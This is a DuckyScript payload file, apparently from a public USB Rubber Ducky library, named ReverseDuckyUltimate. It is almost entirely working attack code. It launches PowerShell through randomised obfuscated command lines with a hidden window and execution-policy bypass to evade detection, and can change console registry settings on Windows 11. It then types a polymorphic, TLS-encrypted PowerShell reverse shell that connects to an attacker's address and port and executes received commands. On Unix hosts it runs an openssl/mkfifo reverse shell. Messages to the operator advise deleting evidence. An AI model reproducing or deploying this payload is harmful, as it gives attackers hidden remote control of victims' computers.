Path: blob/master/payloads/library/remote_access/ReverseDuckyUltimate/payload.txt
2964 views
REM ReverseDuckyUltimate1REM Version 1.32REM OS: Windows / Unix3REM Author: 0i41E4REM Requirement: DuckyScript 3.0, PayloadStudio v.1.3 minimum5REM Morphing, Encrypted Reverse shell executed hidden in the background with custom identifier, the CAPSLOCK light at the end will indicate that the payload was executed.67REM Extension PASSIVE_WINDOWS_DETECT by Korben for best and fastest deployment with guard rails8EXTENSION PASSIVE_WINDOWS_DETECT9REM VERSION 1.110REM AUTHOR: Korben1112REM_BLOCK DOCUMENTATION13Windows fully passive OS Detection and passive Detect Ready14Includes its own passive detect ready.15Does not require additional extensions.1617USAGE:18Extension runs inline (here)19Place at beginning of payload (besides ATTACKMODE) to act as dynamic20boot delay21$_OS will be set to WINDOWS or NOT_WINDOWS22See end of payload for usage within payload23END_REM2425REM CONFIGURATION:26DEFINE #MAX_WAIT 15027DEFINE #CHECK_INTERVAL 2028DEFINE #WINDOWS_HOST_REQUEST_COUNT 229DEFINE #NOT_WINDOWS 73031$_OS = #NOT_WINDOWS3233VAR $MAX_TRIES = #MAX_WAIT34WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))35DELAY #CHECK_INTERVAL36$MAX_TRIES = ($MAX_TRIES - 1)37END_WHILE38IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN39$_OS = WINDOWS40END_IF4142REM_BLOCK EXAMPLE USAGE AFTER EXTENSION43IF ($_OS == WINDOWS) THEN44STRING HELLO WINDOWS!45ELSE46STRING HELLO WORLD!47END_IF48END_REM49END_EXTENSION5051REM Extension ROLLING_POWERSHELL_EXECUTION by 0i41E to obfuscate the start of Powershell52EXTENSION ROLLING_POWERSHELL_EXECUTION53REM VERSION 1.054REM Author: 0i41E55REM Credits: Korben, Daniel Bohannon, Grzegorz Tworek56REM Requirements: PayloadStudio v.1.3 minimum57REM Starts Powershell in uncommon ways to avoid basic detection58REM Via randomisation, obfuscation and usage of less used parameters, this extension helps to evade basic detection.5960REM CONFIGURATION:61REM Add ExecutionPolicy bypass62DEFINE #EXECUTIONPOLICY FALSE63DEFINE #DELAY 2006465$_RANDOM_MIN = 166$_RANDOM_MAX = 1667VAR $RANDOM_PS = $_RANDOM_INT68FUNCTION Rolling_Powershell_Execution()69IF ($RANDOM_PS == 1) THEN70STRING cmd.exe /c "p%PSModulePath:~21,1%weRshe%PUBLIC:~12,1%l.exe -noPr -Noni -wi Hid"71ELSE IF ($RANDOM_PS == 2) THEN72STRING cmd.exe /c "PowerShe%PUBLIC:~12,1%%PUBLIC:~12,1% /NoPr /NonI /w hi"73ELSE IF ($RANDOM_PS == 3) THEN74STRING cmd.exe /c "P%PSModulePath:~21,1%werShell /NoPr /NonI /w hi"75ELSE IF ($RANDOM_PS == 4) THEN76STRING cmd /c "FOR /F "delims=s\ t%PSModulePath:~25,1%kens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni /w H"77ELSE IF ($RANDOM_PS == 5) THEN78STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell -NoPr -NonI -w hi"79ELSE IF ($RANDOM_PS == 6) THEN80STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell /NoPr /Nonin /wind hidD"81ELSE IF ($RANDOM_PS == 7) THEN82STRING cmd.exe /c "P%PSModulePath:~21,1%werShell -NoPr -NonI -w hi"83ELSE IF ($RANDOM_PS == 8) THEN84STRING powershell -NoPro -noninT -win h85ELSE IF ($RANDOM_PS == 9) THEN86STRING cmd /c "p^Owe%ALLUSERSPROFILE:~7,1%Shell -NoP -Noni -wind hidD"87ELSE IF ($RANDOM_PS == 2) THEN88STRING powershell.exe -NoP -nOni -W h89ELSE IF ($RANDOM_PS == 10) THEN90STRING cmd /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -nop -noni -w H"91ELSE IF ($RANDOM_PS == 11) THEN92STRING powershell -nopr -noninT -W HiddEn93ELSE IF ($RANDOM_PS == 12) THEN94STRING cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a -noProF -nonin -win Hi"95ELSE IF ($RANDOM_PS == 13) THEN96STRING cmd /c "P%PSModulePath:~25,1%weRShell -noProf -NonIn -wi h"97ELSE IF ($RANDOM_PS == 14) THEN98STRING powershell -noproF -noni -W Hi99ELSE IF ($RANDOM_PS == 15) THEN100STRING cmd /c "Powe%ALLUSERSPROFILE:~4,1%Shell /NoPr /NonI /%PSModulePath:~17,1% hi"101ELSE ($RANDOM_PS == 16) THEN102STRING powershell.exe -noP -nOnI -windo H103END_IF104105IF_DEFINED_TRUE #EXECUTIONPOLICY106SPACE107IF (($RANDOM_PS % 2) == 0) THEN108STRING -ep ByPasS109ELSE IF (($RANDOM_PS % 5) == 0) THEN110STRING -exec bypass111ELSE IF (($RANDOM_PS % 7) == 0) THEN112STRING -exeC byPasS113ELSE IF (($RANDOM_PS % 10) == 0) THEN114STRING -exEcUtionPoL bYpaSs115ELSE IF (($RANDOM_PS % 12) == 0) THEN116STRING -exEcUtion bYPaSs117ELSE118STRING -eP BYPaSs119END_IF120END_IF_DEFINED121ENTER122DELAY #DELAY123END_FUNCTION124REM EXAMPLE USAGE AFTER EXTENSION125REM DELAY 2000126REM GUI r127REM DELAY 2000128REM Rolling_Powershell_Execution()129END_EXTENSION130131EXTENSION DETECT_FINISHED132REM VERSION 1.0133REM AUTHOR: 0i41E134135REM_BLOCK DOCUMENTATION136USAGE:137Use the function Detect_Finished() to signal the finished execution of your payload.138END_REM139140REM CONFIGURATION:141DEFINE #PAUSE 150142FUNCTION Detect_Finished()143IF ($_CAPSLOCK_ON == FALSE)144CAPSLOCK145DELAY #PAUSE146CAPSLOCK147DELAY #PAUSE148CAPSLOCK149DELAY #PAUSE150CAPSLOCK151ATTACKMODE OFF152ELSE IF153CAPSLOCK154DELAY #PAUSE155CAPSLOCK156DELAY #PAUSE157CAPSLOCK158ATTACKMODE OFF159END_IF160END_FUNCTION161END_EXTENSION162163EXTENSION WINDOWS11_CONSOLE_DOWNGRADE164REM_BLOCK165Version: 1.0166Author: 0i41E167Description: Downgrade the default command prompt of Windows 11 to use Conhost again.168Afterwards PowerShell can be used with paramters like "-WindowStyle Hidden" again.169END_REM170171REM CONFIGURATION:172REM Used to wait until initial execution173DEFINE #INPUT_WAIT 2000174REM GUID for using the legacy console host for terminal execution175DEFINE #CONHOST B23D10C0-E52E-411E-9D5B-C09FDF709C7D176177FUNCTION Console_Downgrade()178DELAY #INPUT_WAIT179GUI r180DELAY 500181STRINGLN powershell -NoP -NonI182DELAY 1000183STRING Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationConsole -Value "{#CONHOST}";184STRINGLN Set-ItemProperty -Path "HKCU:\Console\%%Startup" -Name DelegationTerminal -Value "{#CONHOST}";exit185END_FUNCTION186187REM_BLOCK188EXAMPLE USAGE AFTER EXTENSION: Downgrade the command prompt via registry, then open a hidden PS instance and execute Calc.exe.189Console_Downgrade()190DELAY 2000191GUI r192DELAY 2000193STRINGLN powershell -w h194DELAY 1500195STRINGLN calc.exe;exit196END_REM197END_EXTENSION198199REM Define the attackers IP, Port and Identifier200DEFINE #ADDRESS '0.0.0.0'201DEFINE #PORT 4444202DEFINE #IDENTIFIER Ducky203REM Automatic setup requires openssl!204DEFINE #SETUP FALSE205REM Turn on when target uses Windows 11 - Helps to hide Powershell206DEFINE #WINDOWS11 FALSE207208REM Automatic setup and start listener - Requires openssl!209IF_DEFINED_TRUE #SETUP210IF ($_OS == #NOT_WINDOWS) THEN211DELAY 1500212STRINGLN echo "Setting up Infrastructre - Do not interact!"213DELAY 1000214STRINGLN openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes && echo "Setup complete! Starting listener on Port #PORT " && openssl s_server -quiet -key key.pem -cert cert.pem -port #PORT215ELSE216DELAY 1500217GUI r218DELAY 1000219STRINGLN notepad.exe220DELAY 250221STRING Setup requires an unix based machine with openssl installed!222END_IF223ELSE_DEFINED224IF ($_OS == WINDOWS) THEN225226REM Pseudo random variables for layer one polymorphism227VAR $var_gibberish = $_RANDOM_NUMBER_KEYCODE228VAR $var_gibberish2 = $_RANDOM_LETTER_KEYCODE229VAR $var_gibberish3 = $_RANDOM_LOWER_LETTER_KEYCODE230VAR $var_gibberish4 = $_RANDOM_LETTER_KEYCODE231VAR $var_gibb3rish = $_RANDOM_NUMBER_KEYCODE232VAR $var_gIbberish5 = $_RANDOM_UPPER_LETTER_KEYCODE233VAR $var_gibberish6 = $_RANDOM_NUMBER_KEYCODE234VAR $var_gibBerish1 = $_RANDOM_NUMBER_KEYCODE235236REM Layer two polymorphism237VAR $RANDOM_LAYER = $_RANDOM_INT238239REM Polymorphism function240FUNCTION Polymorphism()241IF (($RANDOM_LAYER % 2) == 0) THEN242STRING $243INJECT_VAR $var_gibberish244INJECT_VAR $var_gibberish2245INJECT_VAR $var_gibberish3246INJECT_VAR $var_gibberish3247INJECT_VAR $var_gibberish4248INJECT_VAR $var_gIbberish5249ELSE IF (($RANDOM_LAYER % 6) == 0) THEN250STRING $251INJECT_VAR $var_gibberish252INJECT_VAR $var_gibberish2253INJECT_VAR $var_gibberish254INJECT_VAR $var_gibberish3255INJECT_VAR $var_gibberish4256INJECT_VAR $var_gibberish257ELSE258STRING $259INJECT_VAR $var_gibberish4260INJECT_VAR $var_gibberish261INJECT_VAR $var_gibberish2262INJECT_VAR $var_gibberish3263INJECT_VAR $var_gibberish264INJECT_VAR $var_gibberish4265END_IF266END_FUNCTION267268REM Polymorphism function269FUNCTION Polymorphism2()270IF (($RANDOM_LAYER % 6) == 0) THEN271STRING $272INJECT_VAR $var_gibberish273INJECT_VAR $var_gibberish2274INJECT_VAR $var_gibberish3275INJECT_VAR $var_gibberish3276INJECT_VAR $var_gibberish4277INJECT_VAR $var_gIbberish5278INJECT_VAR $var_gIbberish5279ELSE IF (($RANDOM_LAYER % 9) == 0) THEN280STRING $281INJECT_VAR $var_gibberish282INJECT_VAR $var_gIbberish5283INJECT_VAR $var_gibberish2284INJECT_VAR $var_gibberish285INJECT_VAR $var_gibberish3286INJECT_VAR $var_gibberish4287INJECT_VAR $var_gibberish288ELSE289STRING $290INJECT_VAR $var_gibberish4291INJECT_VAR $var_gibberish292INJECT_VAR $var_gibberish2293INJECT_VAR $var_gibberish3294INJECT_VAR $var_gibberish6295INJECT_VAR $var_gibberish4296INJECT_VAR $var_gIbberish5297END_IF298END_FUNCTION299300REM Polymorphism function301FUNCTION Polymorphism3()302IF (($RANDOM_LAYER % 1) == 0) THEN303STRING $304INJECT_VAR $var_gibberish305INJECT_VAR $var_gibberish2306INJECT_VAR $var_gIbberish5307ELSE IF (($RANDOM_LAYER % 8) == 0) THEN308STRING $309INJECT_VAR $var_gibberish310INJECT_VAR $var_gIbberish5311INJECT_VAR $var_gibberish312ELSE313STRING $314INJECT_VAR $var_gibberish4315INJECT_VAR $var_gibberish316INJECT_VAR $var_gIbberish5317END_IF318END_FUNCTION319320REM Polymorphism function321FUNCTION Polymorphism4()322IF (($RANDOM_LAYER % 1) == 0) THEN323STRING $324INJECT_VAR $var_gIbberish5325INJECT_VAR $var_gibberish326INJECT_VAR $var_gibberish2327INJECT_VAR $var_gibb3rish328ELSE IF (($RANDOM_LAYER % 8) == 0) THEN329STRING $330INJECT_VAR $var_gibBerish1331INJECT_VAR $var_gibberish332INJECT_VAR $var_gIbberish5333INJECT_VAR $var_gibberish334ELSE335STRING $336INJECT_VAR $var_gibberish6337INJECT_VAR $var_gibberish4338INJECT_VAR $var_gibberish339INJECT_VAR $var_gIbberish5340END_IF341END_FUNCTION342343REM Connection Message344FUNCTION Quack_Slogan()345IF (($RANDOM_LAYER % 2) == 0) THEN346STRING "[!] Quack you $env:USERNAME/$env:COMPUTERNAME! `n[?] Opsec Tip: Use environment variables.`n`n"347ELSE IF (($RANDOM_LAYER % 3) == 0) THEN348STRING "[!] $env:USERNAME/$env:COMPUTERNAME got found a flash drive... `n[?] Considere converting IPs to decimal (e.g. 127.0.0.1 = 2130706433)`n`n"349ELSE IF (($RANDOM_LAYER % 4) == 0) THEN350STRING "[!] $env:USERNAME/$env:COMPUTERNAME compromised by #IDENTIFIER `n[+] Ducks > D0lphins!`n`n"351ELSE IF (($RANDOM_LAYER % 6) == 0) THEN352STRING "[!] Quack Attack on $env:USERNAME/$env:COMPUTERNAME `n[+] Sometimes it is better to wait...Be patient!`n`n"353ELSE IF (($RANDOM_LAYER % 8) == 0) THEN354STRING "[!] Established remote access on $env:USERNAME/$env:COMPUTERNAME `n[?] Watch out for powershell -v 2!`n`n"355ELSE IF (($RANDOM_LAYER % 9) == 0) THEN356STRING "[!] $env:USERNAME/$env:COMPUTERNAME messed with the Duck `n[?] Remember to delete evidence.`n`n"357ELSE358STRING "[!] $env:USERNAME/$env:COMPUTERNAME says Quack! `n[+]...and then he waddled away...`n`n"359END_IF360END_FUNCTION361362REM Downgrades the Console, if Windows 11 is set to TRUE363IF_DEFINED_TRUE #WINDOWS11364Console_Downgrade()365DELAY 2000366END_IF_DEFINED367GUI r368DELAY 500369Rolling_Powershell_Execution()370DELAY 1000371Polymorphism()372STRING =[Text.Encoding]::UTF8.GetBytes(373Quack_Slogan()374STRING );375Polymorphism2()376REM Section were Address & Port get reflected377STRING =New-Object Net.Sockets.TcpClient( #ADDRESS , #PORT );378STRING $s=379Polymorphism2()380STRING .GetStream();381STRING $sSL=New-Object System.Net.Security.SslStream($s,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]));382STRING $sSL.AuthenticateAsClient('madeby.0i41E', $null, "Tls12", $false);383Polymorphism3()384STRING =new-object System.IO.StreamWriter($sSL);385STRING $sSL.write(386Polymorphism()387STRING ,0,388Polymorphism()389STRING .Length);390Polymorphism3()391STRING .Write('392REM Identifier393STRING #IDENTIFIER394STRING @PS '+(&('g'+'l'))+'> ');395Polymorphism3()396STRING .flush();[byte[]]397Polymorphism4()398STRING = 0..65535|%{0};while(($i=$sSL.Read(399Polymorphism4()400STRING , 0,401Polymorphism4()402STRING .Length)) -ne 0){$D=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(403Polymorphism4()404STRING ,0, $i);405STRING $Y=(iex $D | Out-String ) 2>&1;$X=$Y + '406REM Identifier407STRING #IDENTIFIER408STRING @PS ' + (Get-LoCatIon).Path + '> ';409STRING $Z=([text.encoding]::UTF8).GetBytes($X);$sSL.Write($Z,0,$Z.Length);410STRING $sSL.Flush()};exit411DELAY 250412ENTER413REM Indicator of successful execution414Detect_Finished()415ELSE416REM Executing reverse shell when inserted into non-windows box417REM Non-ideal solution for opening terminal (But should work for most unix distros)418DELAY 2000419INJECT_MOD COMMAND420DELAY 2000421STRING terminal422DELAY 500423ENTER424DELAY 1000425STRINGLN which screen >/dev/null && which openssl >/dev/null && screen -md sh -c 'mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect #ADDRESS:#PORT > /tmp/s; rm /tmp/s'426DELAY 1000427STRINGLN exit428REM Indicator of successful execution429Detect_Finished()430END_IF431END_IF_DEFINED432433434